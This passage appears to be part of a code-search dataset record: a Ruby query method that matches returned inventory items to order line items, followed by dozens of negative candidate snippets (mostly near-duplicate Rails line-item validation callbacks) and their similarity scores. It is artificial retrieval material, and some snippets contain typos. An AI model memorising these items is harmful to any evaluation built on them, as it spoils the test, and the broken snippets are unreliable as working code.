"def days(*args)\n if args.first.is_a?(Range)\n @dow = format_range(args.first)\n else\n list = args.map {|day| day_value(day) unless day.is_a?(Fixnum) }\n @dow = list.join(',')\n end\n self\n end",
"def days(*args)\n if args.first.is_a?(Range)\n @dow = format_range(args.first)\n else\n list = args.map {|day| day_value(day) unless day.is_a?(Fixnum) }\n @dow = list.join(',')\n end\n self\n end",
"def event_days\n time_span / (24 * 60 * 60)\n end",
"def week\n @date.cweek\n end",
"def each_wdays(wd,n=1,offset=0,dur=1)\n build_subrange do |s|\n s.step = n\n s.adjust_range { |r| day_range(r) }\n s.offset { |dt| dt.to_date + (wd - dt.to_date.wday)%7 + offset*7 }\n s.increment { |dt,i| dt.to_date + i*7 }\n s.span { |dt| dt.to_date + dur }\n end\n end",
"def days\n\t\tif self.date.past?\n\t\t\t'Past'\n\t\telse\n\t\t\t((self.date - Date.today).to_i).to_s + ' Days'\n\t\tend\n\tend",
"def days(from_date = first_day.date, to_date = last_day.date)\n from_date = Date.new(2017, 1, 1)\n to_date = Date.new(2017, 12, 31)\n\n @days ||= workdays.select { |day| day.hours > 0 && (from_date..to_date).include?(day.date) }\n end",
"def days(num)\n # date calculated as the offset from midnight tommorrow. Zero will provide values for all times \n # today.\n d = Date.today + num\n {\n :type => :date,\n :value => d.strftime(STRFTIME_DATE_FORMAT)\n }\n end",
"def each_sunday( n=1, offset=0, dur=1); each_wdays(self.Sun,n,offset,dur); end",
"def weeks\n\t\tk = offset( first_day.cwday )\n\n [ first_week( k ) ] + middle_weeks( DPW - k )\n end",
"def lead_days\n 0\n end",
"def non_working_week_days\n @non_working_week_days ||= begin\n days = [] # Setting.non_working_week_days\n if days.is_a?(Array) && days.size < 7\n days.map(&:to_i)\n else\n []\n end\n end\n end",
"def weeks\n result = end_week - start_week + 1\n weeks = Date.new(start_date.year, 12, 31).strftime('%W').to_i\n result < 0 ? result + weeks : result\n end"
] | [
"0.81641483",
"0.78555655",
"0.7836805",
"0.7820718",
"0.7798211",
"0.7739801",
"0.77106684",
"0.7653655",
"0.76395094",
"0.756583",
"0.754693",
"0.75292236",
"0.7491989",
"0.7478662",
"0.7452789",
"0.7443966",
"0.7425835",
"0.73917234",
"0.73585266",
"0.7314526",
"0.7245878",
"0.72450876",
"0.7236904",
"0.7222534",
"0.71958864",
"0.7166604",
"0.71282995",
"0.7119519",
"0.70985484",
"0.709133",
"0.7090509",
"0.7081487",
"0.70623577",
"0.7050832",
"0.7034865",
"0.7024423",
"0.70170057",
"0.69988066",
"0.697915",
"0.6974948",
"0.696976",
"0.6968911",
"0.6963535",
"0.6954585",
"0.69528514",
"0.6948162",
"0.6930429",
"0.69233763",
"0.69218826",
"0.690065",
"0.6884273",
"0.6855263",
"0.685458",
"0.68540275",
"0.6846199",
"0.6838092",
"0.6833333",
"0.6815059",
"0.6813867",
"0.68005466",
"0.67807406",
"0.6771664",
"0.67700243",
"0.6769703",
"0.6758894",
"0.673104",
"0.67273796",
"0.67267025",
"0.67119735",
"0.6706396",
"0.67027986",
"0.6690206",
"0.6679189",
"0.66706085",
"0.66702294",
"0.6667477",
"0.6664319",
"0.66589975",
"0.6655174",
"0.6649008",
"0.6646847",
"0.6646847",
"0.66436744",
"0.6630665",
"0.6621706",
"0.6621706",
"0.66204774",
"0.6603555",
"0.66001666",
"0.66001666",
"0.6599439",
"0.65988094",
"0.6586193",
"0.6584623",
"0.6581972",
"0.65750676",
"0.65746117",
"0.65675044",
"0.6559254",
"0.65515125",
"0.6550668"
] | 0.0 | -1 |
check to see if line item exists in the inventories if it does mark the 3pl on the line_item | def check_line_item_in_inventory(line_item)
# feature flipper
if Features.inactive?(:refulfill)
return true
end
found = false
if rii = find_match_and_decrement_available(line_item)
if line_item.order.shipping_address.country.name == 'United States' && rii.vendor == 'bergen'
line_item.return_inventory_item = rii
line_item.refulfill_status = 'new'
found = true
line_item.save
elsif line_item.order.shipping_address.country.name == 'Australia' && rii.vendor == 'next'
line_item.return_inventory_item = rii
line_item.refulfill_status = 'new'
found = true
line_item.save
end
end
found
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def has_line_item?\n true\n end",
"def has_line_items?\n line_items.any?\n end",
"def line_item_items_exist_in_inventory\n self.line_items.each do |line_item|\n next unless line_item.item\n inventory_item = self.from.inventory_items.find_by(item: line_item.item)\n if inventory_item.nil?\n errors.add(:inventory,\n \"#{line_item.item.name} is not available \" \\\n \"at this storage location\")\n end\n end\n end",
"def has_line_item?(id)\n\t\tself.order_line_items.each do |item|\n\t\t\treturn true if item.product_id == id\n\t\tend\n\t\treturn false\n\tend",
"def ensure_not_referenced_by_any_line_item \n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present!\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.count.zero?\nreturn true\nelse\nerrors[:base] << \"Line Items present\"\nreturn false\nend\nend",
"def ensure_not_referenced_by_any_line_item\n \t\tif line_items.empty?\n \t\t\treturn true\n \t\telse\n \t\t\terrors.add(:base, 'Existe linha de item')\n\t\t \treturn false\n \t\tend\n \tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Existuju polozky')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\nif line_items.count.zero?\nreturn true\nelse\nerrors[:base] << \"Line Items present\"\nreturn false\nend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\" #这是什么意思\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\nif line_items.count.zero?\nreturn true\nelse\nerrors[:base] << \"Line Items present\"\nreturn false\nend\nend",
"def match?(line_item)\n @product_ids.include?(line_item.variant.product.id)\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.count.zero?\nreturn true\nelse\nerrors.add(:base, 'Line Items present' )\nreturn false\n end\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end \n end",
"def ensure_not_referenced_by_any_line_item \n\t\tif line_items.empty?\n\t\t\treturn true \n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Istnieja powiazania z Line Items')\n return false;\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n \tif line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n\nend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_item1s.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.empty?\n \t return true\n \telse\n \t errors.add(:base, 'Line Items present' )\n \treturn false\n \tend\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n\t return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n \tif line_items.empty?\n \t\treturn true\n \telse\n \t\terrors.add(:base, 'Line Items present')\n \t\treturn false\n \tend \t\t\n end",
"def ensure_not_referenced_by_any_line_item\n\t if line_items.count.zero?\n\t\t return true\n\t else\n\t\t errors[:base] << \"Line Items present\"\n\t\t return false\n\t end\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, \"Line items exist\")\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Product sedang di referensikan oleh Line Item')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n \t if line_items.empty?\n \t \treturn true\n \t else\n \t \terrors.add(:base, 'Line items present')\n \t \treturn false\n \t end\n \tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t return true\n\t \telse\n\t \t errors.add(:base, 'Line Items present')\n\t return false\n\t end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty? \n return true \n else \n errors.add(:base, 'Line Items present') \n return false \n end \n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.count.zero?\n\treturn true\n\telse\n\terrors[:base] << \"Line Items present\"\n\treturn false\n\tend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.emty?\n\t\t\treturn true\n\t\tesle\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\t\tif line_items.empty?\n\t\t\t\treturn true \n\t\t\telse\n\t\t\t\terrors.add(:base, 'Line Items present')\n\t\t\t\treturn false \n\t\t\tend\n\t\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors[:base] << \"Line Items present\"\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors[:base] << \"Line Items Prsent\"\n\t\t\treturn false\n\t\tend\n\tend",
"def match?(line_item)\n @variant_ids.include?(line_item.variant.id)\n end",
"def test_show_if_has_line_item\n assert_equal @order.has_line_item?(@order.order_line_items.find_by_name(items(:towel).name).id), true\n\n # Create a new order and put just one line item.\n new_order_line_item = OrderLineItem.for_product(items(:small_stuff))\n new_order = Order.new\n new_order.order_line_items << new_order_line_item\n assert new_order.save\n \n # Search for an existent line item of ANOTHER order.\n assert_equal @order.has_line_item?(new_order.order_line_items.find_by_name(items(:small_stuff).name).id), false\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\t\telse\n\t\t\terrors.add(:base, 'Line Items present' )\n\t\t\treturn false\n\t\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.empty?\n\treturn true\n\telse\n\terrors.add(:base, 'Line Items present')\n\treturn false\n\tend\n\tend",
"def ensure_not_referenced_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present' )\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present' )\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n \tif line_items.empty?\n \t\treturn true\n \telse\n \t\terrors.add(:base, 'Line Items Present')\n \t\treturn false\n \tend\n end",
"def ensure_not_referenced_by_any_line_item # hook method (a method that Rails calls automatically at a given point in an object’s life)\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.empty?\n\treturn true\n\telse\n\terrors.add(:base, 'Line Items present')\n\treturn false\n\tend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_item_line\n if item_lines.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend"
] | [
"0.7575127",
"0.72356254",
"0.71560377",
"0.7098415",
"0.7065873",
"0.7059247",
"0.7028707",
"0.6990496",
"0.69901574",
"0.6968333",
"0.6947016",
"0.69288427",
"0.6928456",
"0.6886449",
"0.68685293",
"0.68636286",
"0.6862128",
"0.6854091",
"0.68417156",
"0.68411756",
"0.68411756",
"0.68411756",
"0.6840865",
"0.6837888",
"0.6836572",
"0.6820581",
"0.6818721",
"0.68098813",
"0.6807094",
"0.68061244",
"0.6802275",
"0.6800887",
"0.67996347",
"0.6799503",
"0.6798673",
"0.67898583",
"0.6781821",
"0.6773744",
"0.6770066",
"0.6767985",
"0.6767456",
"0.67655784",
"0.6760843",
"0.6741413",
"0.6739609",
"0.6727146",
"0.6725981",
"0.67252254",
"0.67198867",
"0.67190945",
"0.6711884",
"0.6711884",
"0.6711884",
"0.67079145",
"0.6707558",
"0.67023754",
"0.67023754",
"0.6702117",
"0.6698879",
"0.66830945",
"0.6678033",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6674587",
"0.66739947",
"0.6664716",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.6664211",
"0.66639876",
"0.66559213",
"0.66559213",
"0.66559213"
] | 0.7079307 | 4 |
match by upc first, then try matching via properties, returns return_inventory_item or nil | def find_match_and_decrement_available(line_item)
gs = Orders::LineItemPresenter.new(line_item).global_sku
if rii = ReturnInventoryItem.where(["upc= ? and active = true and available > 0", gs&.id]).first
rii.available -= 1
rii.save
elsif gs
#do this check since global skus are jacked up and can't be trusted
gs = GlobalSku.where(
style_number: gs.style_number,
product_name: gs.product_name,
size: gs.size,
color_id: gs.color_id,
customisation_id: gs.customisation_id,
height_value: gs.height_value,
product_id: gs.product_id,
).first
if rii = ReturnInventoryItem.where(["upc = ? and active = true and available > 0", gs&.id]).first
rii.available -= 1
rii.save
end
end
rii
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def find_item_by_product(product, items)\n\t\tsku = product.sap_sku.to_s.upcase\n\t\tsku_options = sku.match(/\\-?[MV]$/) ? [sku, sku.gsub(/\\-?[MV]$/, '')] : sku_options = [\"#{sku}-V\", \"#{sku}-M\", \"#{sku}V\", \"#{sku}M\", sku]\n\n\t\titem = nil\n\t\tsku_options.each do |s|\n\t\t\tif item = items[s]\n\t\t\t\treturn item\n\t\t\tend\n\t\tend\n\t\titem\n\tend",
"def find(item_name)\n @inventory.find(item_name)\n end",
"def get_item_in_this_state(inventory_item_params, state = nil)\n return nil if (state.nil? || InventoryItemState.find_by(name: state).nil?) #No need to check if the state is nil.\n item_state_id = InventoryItemState.find_by(name: state).id\n\n in_it = InventoryItem.find_by(item_id: inventory_item_params[:item_id],\n location_id: inventory_item_params[:location_id],\n inventory_item_state_id: item_state_id,\n inventory_item_condition_id: inventory_item_params[:inventory_item_condition_id])\n\n return nil if in_it.nil?\n return in_it\n end",
"def assign_inventory_item\n self.inventory_item ||= inventory.item_by_product_and_code(product, lot_code)\n self\n end",
"def unequip_item(item)\n pair = @outfit.detect { |type, value| value.name.casecmp(item.to_s).zero? }\n if pair\n # On a successful find, the \"detect\" method always returns\n # an array of length 2; thus, the following line should not fail.\n item = pair[1]\n item.unequip(self)\n add_item(item)\n else\n print NOT_EQUIPPED_ERROR\n end\n end",
"def find_item(item)\n return nil if cart_items.blank?\n\n item = prepare_for_cart_item(item)\n result = cart_items.detect do |ci|\n ci.type == item.type && ci.unit == item.unit\n end\n return result.nil? ? false : result\n end",
"def find_by(search, category=\"name\")\n #category is a string\n #search is a string\n output = all.select do |item|\n if category == \"moveset\" || category == \"type\"\n nil #forces partial matching\n else\n item.instance_variable_get(\"@#{category}\").downcase.gsub(/\\s+/, \"\") == search.downcase.gsub(/\\s+/, \"\")\n end\n end\n\n #returns the item or nil if not found\n\n if output.size < 1\n output = find_partial(search, category)\n end\n output\n end",
"def find_pet_by_name(pet_shop, pet_name)\n for item in pet_shop[:pets]\n if item[:name] == pet_name\n return item\n end\n end\n return nil\nend",
"def locate(id)\n return self if are_you(id)\n\n # Try Inventory\n i = @inv.fetch(id)\n return i if !i.nil?\n\n return nil\n end",
"def helper(action, targetNoun, itemNoun, entities, inventory)\n target = action[targetNoun]\n if !target.nil? && entities.find { |x| x.to_sym == target.target }\n result = target[itemNoun]\n return [:success, target.target, result.result] if \n (!result.nil? && inventory.find { |x| x.to_sym == itemNoun.to_sym })\n end\n return nil\n end",
"def find_item_by_name_in_collection(name, collection)\n i = 0\n while i < collection.length do\n item_hash = collection[i]\n item_hash[:item] == name ? (return item_hash) : nil\n i += 1\n end\nend",
"def gms_find_code_value_item(items, code_value)\n items.each_item do |item|\n return item if item[CNCS] && item[CNCS].items[0][CV].value == code_value\n end\n\n nil\nend",
"def findVmItem(t, item)\n\tt = t.upcase\n\th = Hash[getFromApi('/api/v1/vmware/vm?is_relic=false&name='+t+'&primary_cluster_id=local')]\n#\tputs h['data'][0][item]\n\treturn h['data'][0][item]\nend",
"def find_item(purchase_or_id)\n raise NotImplementedError\n end",
"def find_single_item(hash,lookup)\n if hash[lookup]==nil\n return nil\n else\n return hash[lookup][:item]\n end\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n # else\n # return nil\n end\n end\n return\nend",
"def find_item_by_name(list, search_item)\n found_entry = {}\n list.each do |current_item|\n if current_item[\"productName\"] == search_item[\"productName\"]\n found_entry=current_item\n end\n end\n return found_entry\n end",
"def lookup(batch)\n req = Vacuum.new key: 'AKIAJA2IADZPBGHJTZRQ',\n secret: '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',\n tag: @tag,\n locale: 'us'\n \n \n params = { 'Operation' => 'ItemLookup',\n 'SearchIndex' => 'Books',\n 'ItemLookup.Shared.IdType' => 'ISBN',\n 'ItemLookup.Shared.Condition' => 'All',\n 'ItemLookup.Shared.MerchantId' => 'All',\n 'ItemLookup.Shared.ResponseGroup' => 'OfferFull'}\n \n batch.each_with_index do |item,index|\n params['ItemLookup.'+(index+1).to_s+'.ItemId'] = item\n end\n req.build params\n \n res = req.get\n items = []\n if res.valid?\n res.to_hash['Items'].each do |item|\n prod = {}\n prod['ASIN'] = item['Item']['ASIN']\n prod['New Price'] = item['Item']['OfferSummary']['LowestNewPrice']['FormattedPrice']\n prod['Used Price'] = item['Item']['OfferSummary']['LowestUsedPrice']['FormattedPrice']\n prod['url'] = \"http://www.amazon.com/dp/\"+prod['ASIN']+'/?tag='+@tag\n items << prod\n end\n end\n #puts res.to_hash.to_json\n items\nend",
"def fetch_from_inventory(an_order)\n order = extract_code_qty(an_order)\n return Inventory.fetch_an_item(order[:code])\n end",
"def expected_inventory\n result = @inventory.dup\n # TODO DRY this up with `Person#eat`\n result[:fish] -= @daily_appetite = 10\n result\n end",
"def gather_item\n local_item = FoodItem.fetch_local_item @item_id\n return local_item unless local_item.nil?\n\n item_id = @item_id.split('-')\n remote_item = fetch_remote_item item_id[0], item_id[1]\n remote_item = FoodItem.new_item remote_item\n\n return remote_item unless remote_item.nil?\n\n nil # fallback\n end",
"def available_inventory\n object.check_inventory\n end",
"def get_rental_info_by_book_title(searched_title)\n if searched_title == @title\n return @inventory[0][:rental_details]\n else\n return nil\n end\nend",
"def get_item(item)\n return item.move(@inventory)\n end",
"def gh_find_code_value_item(items, code_value)\n items.each_item do |item|\n return item if item[CNCS] && item[CNCS].items[0][CV].value == code_value\n end\n\n nil\nend",
"def determine_item(item_type, item_id)\n case item_type\n \n when \"weapon_id\"\n Weapon.find(item_id) \n when \"armor_id\"\n Armor.find(item_id)\n when \"potion_id\"\n Potion.find(item_id)\n end\n end",
"def check_line_item_in_inventory(line_item)\n # feature flipper\n if Features.inactive?(:refulfill)\n return true\n end\n found = false\n\n if rii = find_match_and_decrement_available(line_item)\n if line_item.order.shipping_address.country.name == 'United States' && rii.vendor == 'bergen'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n elsif line_item.order.shipping_address.country.name == 'Australia' && rii.vendor == 'next'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n end\n end\n found\n end",
"def source_item\n source.item_by_product_and_code(product, lot_code)\n end",
"def upc\n upc_code = params[:upc]\n redirect_to root_url, alert: 'Not a valid UPC' and return unless upc_code\n @item = Item.code_find_or_create_by(upc_code)\n redirect_to root_url, alert: 'No product matches found' and return unless @item.errors.empty?\n redirect_to add_item_to_cart_path(@item.id) and return\n end",
"def test_selectItem\n\t\t#vm = VendingMachine.new\n\t\tvm = VendingMachine.new(@db)\n\t\tvm.output = StringIO.new\n\t\t# vm.items[\"A1\"].quantity = 1\n\t\tvm.inputMoney(0.50)\n\t\titem = vm.selectItem(\"A1\")\n\t\tassert_not_nil(item)\n\t\tassert_equal(\"A1\", item.code)\n\t\tassert_equal(\"Almond Joy\", item.description)\n\tend",
"def find_by_code(code)\n record = fetch(code)\n return unless record\n\n Models::InventoryItem.new(**record.merge(code: code,\n discount: @discounts_rep.find_by_code(code)))\n end",
"def find_pet_by_name(pet_shop, supplied_name)\n for pet in pet_shop[:pets]\n return pet if supplied_name == pet[:name]\n end\n return nil\nend",
"def use_item_by_object(item, e)\n index = has_item_by_object(item)\n if (index != -1)\n actual_item = inventory[index].first\n actual_item.use(e)\n if actual_item.consumable then remove_item(actual_item) end\n else\n print \"What?! You don't have THAT!\\n\\n\"\n end\n end",
"def find_pet_by_name (shop,pet_name)\n for pet in shop[:pets]\n if pet[:name] == pet_name\n return pet\n # else\n end\n end\nend",
"def find_pet_by_name(petshop, name)\n for pet in petshop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
